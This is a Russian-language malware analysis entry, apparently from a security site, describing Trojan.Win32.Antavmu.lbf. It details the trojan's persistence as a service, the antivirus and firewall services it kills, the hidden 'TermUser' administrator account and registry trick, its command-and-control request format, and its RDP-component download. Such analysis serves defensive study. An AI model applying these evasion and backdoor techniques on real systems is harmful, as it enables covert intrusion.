Security Lab

Trojan.Win32. Antavmu.lbf

Trojan.Win32. Antavmu.lbf

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE-EXE файл). Имеет размер 45904 байта.

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE-EXE файл). Имеет размер 45904 байта. Упакована при помощи UPX. Распакованный размер — около 79 KБ. Написан на C++.

Инсталляция

Копирует свое тело в системный каталог Windows или во временный каталог текущего пользователя, если в системный каталог скопировать не удалось:

%System%\ms<rnd>.exe
%Temp%\ms<rnd>.exe
Где <rnd> - произвольная последовательность из цифр и букв латинского алфавита, например, "vgzcjw" или "ngszup".

Для автоматического запуска троянец создает в системе службу, которая запускает его исполняемый файл при каждой последующей загрузке Windows, при этом создается следующий ключ реестра:

[HKLM\System\CurrentControlSet\Services\Network Adapter Events]

name="doc3">

Деструктивная активность

Троянец выполняет следующие деструктивные действия:

  • Для контроля уникальности своего процесса в системе троянец создает уникальный идентификатор с именем:
    msrdp#v2.1.27
  • Останавливает и удаляет следующие службы:
    Norton Antivirus Service
    Panda Antivirus
    Detector de OfficeScanNT
    McAfee Framework Service
    sharedaccess
    OutpostFirewall
    lnsfw1
    sfilter
    SmcService
    UmxPol
    UmxLU
    UmxAgent
    UmxCfg
    kmxagent
    kmxbig
    kmxcfg
    kmxfile
    kmxfw
    kmxids
    kmxndis
    kmxsbx
    ZoneAlarm
    vsmon
    vsdatant
    IswSvc
    ISWKL
    klif
    klpf
    klpid
    kl1
    WinDefend
    MpsSvc
    BFE
    F-Secure Filter
    F-Secure Gatekeeper
    F-Secure HIPS
    F-Secure Recognizer
    fsbts
    FSFW
    F-Secure Gatekeeper Handler Starter
    FSDFWD
    FSMA
    FSORSPClient
  • Создает пользователя с именем:
    TermUser
    И добавляет пользователя в группы:
    Администраторы
    Пользователи удаленного рабочего стола
  • Отключает отображение имени пользователя в диалоговом окне входа в систему. Для этого создает запись в системном реестре:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
    SpecialAccounts\UserList]"TermUser"= "0"
  • Проверяет наличие подключения к сети Интернет, путем обращения к следующим URL адресам:
    www.microsoft.com
    www.yahoo.com
    www.msn.com
  • Для получения команд, троянец отправляет запрос вида:
    POST /query222.php HTTP/1.1 Content-Type: application
    /x-www-form-urlencoded Host: <URL> Content-Length:
    <длинна поля данных в байтах> Cache-Control: no-cache
    q=i&id=<серийный номер тома>-<версия ОС>&o=
    < детальная информация об ОС>&v=2.1.27&c=<информация
    о локализации>&l=<язык>&t=16&lip=<IP адрес зараженного
    компьютера>
    &ts=OK&u=<имя пользователя>
    где <URL> - один из следующих адресов:
    znco***ent.info
    ocrd***tcipty.com
    ocrd***tc.info
    hvk***emvbim.com
    eshtg***jsyfjoqt.info
    eshtg-***syf.com
    xlam***u-lrychj.info
    xlam***u-lr.com
    map***-jragnrw.info
    map***-jra.com
    ftiuh***-tzgk.info
    cqfreo***-qwdhmor.com
    cqfre***-qwd.info
    vjyk***-ajpwafh.com
    vjyk***-ajp.info
    kynzm***h-yelpu.com
    kynzm***h-y.info
    drgs***-irxei.com
    aodp***-foubfkmp.info
    aodp***-foub.com
    thw***-qyhnuydf.info
    znc***-went.info
    По команде троянец может загружать обновления, загружать и выполнять инсталляцию компонентов предназначенных для предоставления доступа к зараженному компьютеру по RDP (удаленный рабочий стол) протоколу. Загружаемые файлы сохраняются во временно каталоге текущего пользователя:
    %Temp%\tem<rnd1>.tmp
    где <rnd1> - произвольная последовательность из цифр и букв латинского алфавита. Если загруженный файл является архивом, содержащим компоненты для установки, то троянец создает каталог и помещает туда извлеченные файлы:
    %Temp%\b<rnd2>\
    где <rnd2> - произвольная последовательность из цифр и букв латинского алфавита. А затем выполняет команду:
    %System%\cmd.exe /C %Temp%\b<rnd2>\install.cmd
    После чего через час выполняет перезагрузку зараженного компьютера.
  • Троянец сохраняет свои настройки в зашифрованном виде в ключе реестра:
    [HKLM\Software\Microsoft\TermServMonitor]

Ищем баги вместе! Но не те, что в продакшене...

Разбираем кейсы, делимся опытом, учимся на чужих ошибках

Зафиксируйте уязвимость своих знаний — подпишитесь!